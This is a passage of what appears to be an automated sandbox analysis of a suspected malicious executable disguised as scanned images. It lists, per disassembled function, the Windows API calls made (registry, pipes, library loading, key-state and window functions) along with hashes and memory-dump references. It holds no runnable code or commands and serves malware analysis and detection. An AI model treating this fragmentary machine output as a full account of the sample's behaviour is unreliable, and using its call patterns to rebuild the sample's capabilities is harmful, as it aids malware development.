                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00A7DB8E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                        • String ID: DllGetClassObject
                                                        • API String ID: 753597075-1075368562
                                                        • Opcode ID: b6568eba1818eb9f0fb042558b3df6c7dd9a37d0ce3c049e8c069b84cf9fcdc6
                                                        • Instruction ID: 40f9e790d44b780c7a643b21784ff9fa86f25839e59f3b366785e3e6e59537c2
                                                        • Opcode Fuzzy Hash: b6568eba1818eb9f0fb042558b3df6c7dd9a37d0ce3c049e8c069b84cf9fcdc6
                                                        • Instruction Fuzzy Hash: 0C4180B1600209EFDB15CF64CC84A9A7BB9EF88351F15C1AAAD099F246D7B1DD40CBA0
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A82CAF
                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00A82CCB
                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00A82D11
                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00AE6890,00000000), ref: 00A82D5A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Menu$Delete$InfoItem_memset
                                                        • String ID: 0
                                                        • API String ID: 1173514356-4108050209
                                                        • Opcode ID: 922fd285dee5182a1211af6139149219573f8a0156f5ebaff764cab5615f1ae6
                                                        • Instruction ID: 1fee2805ebcdd3294f31fe7e24cc3789b45959835e6751c67b75aade80a3978e
                                                        • Opcode Fuzzy Hash: 922fd285dee5182a1211af6139149219573f8a0156f5ebaff764cab5615f1ae6
                                                        • Instruction Fuzzy Hash: 4841B1702053029FD724EF24C944B6ABBE8FF85320F144A2EF965972E1D770E905CBA2
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00AA8B4D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID: @U=u
                                                        • API String ID: 634782764-2594219639
                                                        • Opcode ID: 0ed0e8dfe3b9803dd9f581cf54a8a43a6e4c0cd8066e2d495fbe09363d82d21c
                                                        • Instruction ID: efeb657644a843e1c6644caf46c34535c5d90580357d2852de188f72964b12f3
                                                        • Opcode Fuzzy Hash: 0ed0e8dfe3b9803dd9f581cf54a8a43a6e4c0cd8066e2d495fbe09363d82d21c
                                                        • Instruction Fuzzy Hash: D831CFB4601214BEEF249F58CC85FAD37A4EB07350F244916FA52DB2E0DF38A9408B61
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00A9DAD9
                                                          • Part of subcall function 00A279AB: _memmove.LIBCMT ref: 00A279F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: BuffCharLower_memmove
                                                        • String ID: cdecl$none$stdcall$winapi
                                                        • API String ID: 3425801089-567219261
                                                        • Opcode ID: 66946196cd9fca5e7eb1b0ab8e428f871cba09949b6b0ba9aea3903e71581867
                                                        • Instruction ID: 632916c7642cfc5dbbea5fc6eeee6ea50fd83422168ef22da0e67fd5738d12d0
                                                        • Opcode Fuzzy Hash: 66946196cd9fca5e7eb1b0ab8e428f871cba09949b6b0ba9aea3903e71581867
                                                        • Instruction Fuzzy Hash: 5E319675A006199FCF10DF98CD819EEB3F4FF45310B108629E866A77D1DB31AA45CB90
                                                        APIs
                                                          • Part of subcall function 00A21D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A21D73
                                                          • Part of subcall function 00A21D35: GetStockObject.GDI32(00000011), ref: 00A21D87
                                                          • Part of subcall function 00A21D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A21D91
                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00AA66D0
                                                        • LoadLibraryW.KERNEL32(?), ref: 00AA66D7
                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00AA66EC
                                                        • DestroyWindow.USER32(?), ref: 00AA66F4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                        • String ID: SysAnimate32
                                                        • API String ID: 4146253029-1011021900
                                                        • Opcode ID: dec46985e6d37d3aba6bbd5d672d7c69cbc16192504f3de264b9d8fe7175e422
                                                        • Instruction ID: 9ca1ce168490fa40ce8bbe9e594b76ceaa0efee35ba5fbe756044270ceb1f95d
                                                        • Opcode Fuzzy Hash: dec46985e6d37d3aba6bbd5d672d7c69cbc16192504f3de264b9d8fe7175e422
                                                        • Instruction Fuzzy Hash: F6219D71210206AFEF148FA4EC80EBB77ADEB5A368F184629F911971E0DB71CC519B60
                                                        APIs
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00A8705E
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A87091
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00A870A3
                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00A870DD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CreateHandle$FilePipe
                                                        • String ID: nul
                                                        • API String ID: 4209266947-2873401336
                                                        • Opcode ID: 93d955f7a3d73136b97b098c13139a9c9161d04414317fbd4230fe2903220cfa
                                                        • Instruction ID: 7cbc0ebabf77ca2b91e7ce042f84368e411c5474d4052ea39ea88425dca34a22
                                                        • Opcode Fuzzy Hash: 93d955f7a3d73136b97b098c13139a9c9161d04414317fbd4230fe2903220cfa
                                                        • Instruction Fuzzy Hash: 5D217F74504209ABDB20AF68DC05A9E77F8AF55721F304A29F9A1D72D0D771DC40CB50
                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00A8712B
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A8715D
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00A8716E
                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00A871A8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CreateHandle$FilePipe
                                                        • String ID: nul
                                                        • API String ID: 4209266947-2873401336
                                                        • Opcode ID: 50ceabdc74ce4c24aede27e27593b4a3b69ec9d83724904611c21daef5f126fc
                                                        • Instruction ID: f51782577c634299ec8923742aa8bbbac46412512c61a3205cc4ca3ef7bef9fa
                                                        • Opcode Fuzzy Hash: 50ceabdc74ce4c24aede27e27593b4a3b69ec9d83724904611c21daef5f126fc
                                                        • Instruction Fuzzy Hash: B5218375608206ABDB20AF689C08B9EB7E8AF55724F300B19FDB1D72E0DB70D841CB51
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00A8AEBF
                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00A8AF13
                                                        • __swprintf.LIBCMT ref: 00A8AF2C
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,00AAF910), ref: 00A8AF6A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                        • String ID: %lu
                                                        • API String ID: 3164766367-685833217
                                                        • Opcode ID: 138f5fde83503b7302e70ac29341e25c58f6ba492c3d6eeacbc569dcda66493a
                                                        • Instruction ID: a2acdc33f4e72f692e721e4d7e46ef8b759f5e3b1a2dc8a87e43dd1c2479049f
                                                        • Opcode Fuzzy Hash: 138f5fde83503b7302e70ac29341e25c58f6ba492c3d6eeacbc569dcda66493a
                                                        • Instruction Fuzzy Hash: 42214135A00109AFDB10EFA4DD85EAE7BB8FF89704B104069F909EB251DB31EE45CB61
                                                        APIs
                                                          • Part of subcall function 00A27D2C: _memmove.LIBCMT ref: 00A27D66
                                                          • Part of subcall function 00A7A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00A7A399
                                                          • Part of subcall function 00A7A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A7A3AC
                                                          • Part of subcall function 00A7A37C: GetCurrentThreadId.KERNEL32 ref: 00A7A3B3
                                                          • Part of subcall function 00A7A37C: AttachThreadInput.USER32(00000000), ref: 00A7A3BA
                                                        • GetFocus.USER32 ref: 00A7A554
                                                          • Part of subcall function 00A7A3C5: GetParent.USER32(?), ref: 00A7A3D3
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00A7A59D
                                                        • EnumChildWindows.USER32(?,00A7A615), ref: 00A7A5C5
                                                        • __swprintf.LIBCMT ref: 00A7A5DF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                        • String ID: %s%d
                                                        • API String ID: 1941087503-1110647743
                                                        • Opcode ID: 7a5ce48d1e052ffb6d74c3d2aea49ab20f502a16aea50c5d7d9e184e10638e32
                                                        • Instruction ID: 92fbf6316b11a4bf984a9590f8c2d2071c76fa5067b2cfdd725b77c2205ac4ce
                                                        • Opcode Fuzzy Hash: 7a5ce48d1e052ffb6d74c3d2aea49ab20f502a16aea50c5d7d9e184e10638e32
                                                        • Instruction Fuzzy Hash: 9E11AF75200209BBDF14BFA4ED85FEE7778AF99710F04C075B90CAA192CB709A468B75
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00A82048
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                        • API String ID: 3964851224-769500911
                                                        • Opcode ID: f713ae3ba85549372e98283d43acaf86946954478f68f74de990f6f9454d451c
                                                        • Instruction ID: 986384c29722d371a1e6707ee0fdad1739970644b9eb277d8e780e6ed4ec1c2d
                                                        • Opcode Fuzzy Hash: f713ae3ba85549372e98283d43acaf86946954478f68f74de990f6f9454d451c
                                                        • Instruction Fuzzy Hash: 3F113934D4011A8FCF00EFA4DA419BEB7B4BF66304F108569E856A7352EB326D0ADB50
                                                        APIs
                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A9EF1B
                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00A9EF4B
                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00A9F07E
                                                        • CloseHandle.KERNEL32(?), ref: 00A9F0FF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                        • String ID:
                                                        • API String ID: 2364364464-0
                                                        • Opcode ID: dabcdb10dfbea801e65659115dbdae8d6162c35066be5ba5c9b6b90a201cac5e
                                                        • Instruction ID: 10bdd0c6ed18dd0a9b6786f061479b26f3b08f638dddf3f0398dc70dd0f9a946
                                                        • Opcode Fuzzy Hash: dabcdb10dfbea801e65659115dbdae8d6162c35066be5ba5c9b6b90a201cac5e
                                                        • Instruction Fuzzy Hash: 1F8172716043119FDB24DF28D946F2BB7E5AF48B20F14882DF599DB292DB70EC418B91
                                                        APIs
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                          • Part of subcall function 00AA10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AA0038,?,?), ref: 00AA10BC
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AA0388
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AA03C7
                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00AA040E
                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00AA043A
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00AA0447
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                        • String ID:
                                                        • API String ID: 3440857362-0
                                                        • Opcode ID: c65b6a647b55f8aaeb84c599eceac8de5452d4379cf7a9050010866e195920e5
                                                        • Instruction ID: c380a113cfcb336499ce1983402923cd8baa534ad26be87b23e6323796db163a
                                                        • Opcode Fuzzy Hash: c65b6a647b55f8aaeb84c599eceac8de5452d4379cf7a9050010866e195920e5
                                                        • Instruction Fuzzy Hash: E7513A31208205AFDB04EF68D981E6FB7E8FF89704F04892DB5959B2A1DB31E905CB52
                                                        APIs
                                                          • Part of subcall function 00A29997: __itow.LIBCMT ref: 00A299C2
                                                          • Part of subcall function 00A29997: __swprintf.LIBCMT ref: 00A29A0C
                                                        • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00A9DC3B
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00A9DCBE
                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A9DCDA
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00A9DD1B
                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00A9DD35
                                                          • Part of subcall function 00A25B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00A87B20,?,?,00000000), ref: 00A25B8C
                                                          • Part of subcall function 00A25B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00A87B20,?,?,00000000,?,?), ref: 00A25BB0
                                                        Similarity
                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 327935632-0
                                                        • Opcode ID: 2bb22e97c0a9978b4b659b70fe739b39a658061ce7f0151780511d2422347997
                                                        • Instruction ID: 647980ca9ca072f81f23ddb5f6e78fc7042a89a806572ede0bbd8d9efc9da118
                                                        • Opcode Fuzzy Hash: 2bb22e97c0a9978b4b659b70fe739b39a658061ce7f0151780511d2422347997
                                                        • Instruction Fuzzy Hash: 43512735A00215DFDB00EFA8D5849AEB7F4FF59320B048069E919AB361DB31AD85CB90
                                                        APIs
                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00A8E88A
                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00A8E8B3
                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00A8E8F2
                                                          • Part of subcall function 00A29997: __itow.LIBCMT ref: 00A299C2
                                                          • Part of subcall function 00A29997: __swprintf.LIBCMT ref: 00A29A0C
                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00A8E917
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00A8E91F
                                                        Similarity
                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1389676194-0
                                                        • Opcode ID: 086e16f1a7309424d34a852be3753cd989ddcfad1f3c039b5d2025f55b41911f
                                                        • Instruction ID: 8ae54a96a35d59d412a75474633d53dffb812de6025d78f943a477e9cd56dae8
                                                        • Opcode Fuzzy Hash: 086e16f1a7309424d34a852be3753cd989ddcfad1f3c039b5d2025f55b41911f
                                                        • Instruction Fuzzy Hash: 2B512B35A00215DFDB05EF68DA81AAEBBF5EF49310B1480A9E849AB361CB31ED51DB50
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 00A22357
                                                        • ScreenToClient.USER32(00AE67B0,?), ref: 00A22374
                                                        • GetAsyncKeyState.USER32(00000001), ref: 00A22399
                                                        • GetAsyncKeyState.USER32(00000002), ref: 00A223A7
                                                        Similarity
                                                        • API ID: AsyncState$ClientCursorScreen
                                                        • String ID:
                                                        • API String ID: 4210589936-0
                                                        • Opcode ID: c22c404842273ba8e34fcc4d3a9bf71bb6971c7e7599a3c9270fea744f5e8f0f
                                                        • Instruction ID: d41f025bd04c4a1b3288e3d3b7b62afcf226dd068ea763533439183e298fe02f
                                                        • Opcode Fuzzy Hash: c22c404842273ba8e34fcc4d3a9bf71bb6971c7e7599a3c9270fea744f5e8f0f
                                                        • Instruction Fuzzy Hash: 4D416F31504215FFDF15DFA8D844AEDBBB4FB05321F20432AF8249A290C7749954DBA1
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A7695D
                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 00A769A9
                                                        • TranslateMessage.USER32(?), ref: 00A769D2
                                                        • DispatchMessageW.USER32(?), ref: 00A769DC
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A769EB
                                                        Similarity
                                                        • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                        • String ID:
                                                        • API String ID: 2108273632-0
                                                        • Opcode ID: 58e7cf4082162b0c0c351faa567a9bb3a9902ee635c75c1b3cb2cac619e552f0
                                                        • Instruction ID: 390b90a945bbb611b2e0831f35173295ee63667d176ab8d19fe7304aa5d0b57d
                                                        • Opcode Fuzzy Hash: 58e7cf4082162b0c0c351faa567a9bb3a9902ee635c75c1b3cb2cac619e552f0
                                                        • Instruction Fuzzy Hash: C831F831900A86AEDB20CFF4CC84FF67BBCAB12340F14C969E529C60A1D7349886D790
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00A78F12
                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00A78FBC
                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00A78FC4
                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00A78FD2
                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00A78FDA
                                                        Similarity
                                                        • API ID: MessagePostSleep$RectWindow
                                                        • String ID:
                                                        • API String ID: 3382505437-0
                                                        • Opcode ID: 8094d9367fbdbe5fda4caf13c021eaef8470e203badbdea194bb70d11c3e1634
                                                        • Instruction ID: 978a23faa551c58347beefb1328cb8f6c39934317c9339fa6db2a2232d789b23
                                                        • Opcode Fuzzy Hash: 8094d9367fbdbe5fda4caf13c021eaef8470e203badbdea194bb70d11c3e1634
                                                        • Instruction Fuzzy Hash: 0131CE7150021AEFDB14CFA8DD4CA9E7BB6EB05325F10C229F929EA1D0C7B49914DB91
                                                        APIs
                                                          • Part of subcall function 00A22612: GetWindowLongW.USER32(?,000000EB), ref: 00A22623
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AAB44C
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00AAB471
                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00AAB489
                                                        • GetSystemMetrics.USER32(00000004), ref: 00AAB4B2
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00A91184,00000000), ref: 00AAB4D0
                                                        Similarity
                                                        • API ID: Window$Long$MetricsSystem
                                                        • String ID:
                                                        • API String ID: 2294984445-0
                                                        • Opcode ID: 3c318766c06159de620515e7f2bf8b6ba6abbce6e88f9aad612dbabc101eb6ca
                                                        • Instruction ID: 8a5586c2b4e154912e49f4d00a4775b70f8bb20a9bb60308a0727ad6bcc85966
                                                        • Opcode Fuzzy Hash: 3c318766c06159de620515e7f2bf8b6ba6abbce6e88f9aad612dbabc101eb6ca
                                                        • Instruction Fuzzy Hash: 9F218671920266AFCB149F78DC44A6537A4FB0A760F144B39F926D71E3E7319811DBA0
                                                        APIs
                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A2134D
                                                        • SelectObject.GDI32(?,00000000), ref: 00A2135C
                                                        • BeginPath.GDI32(?), ref: 00A21373
                                                        • SelectObject.GDI32(?,00000000), ref: 00A2139C
                                                        Similarity
                                                        • API ID: ObjectSelect$BeginCreatePath
                                                        • String ID:
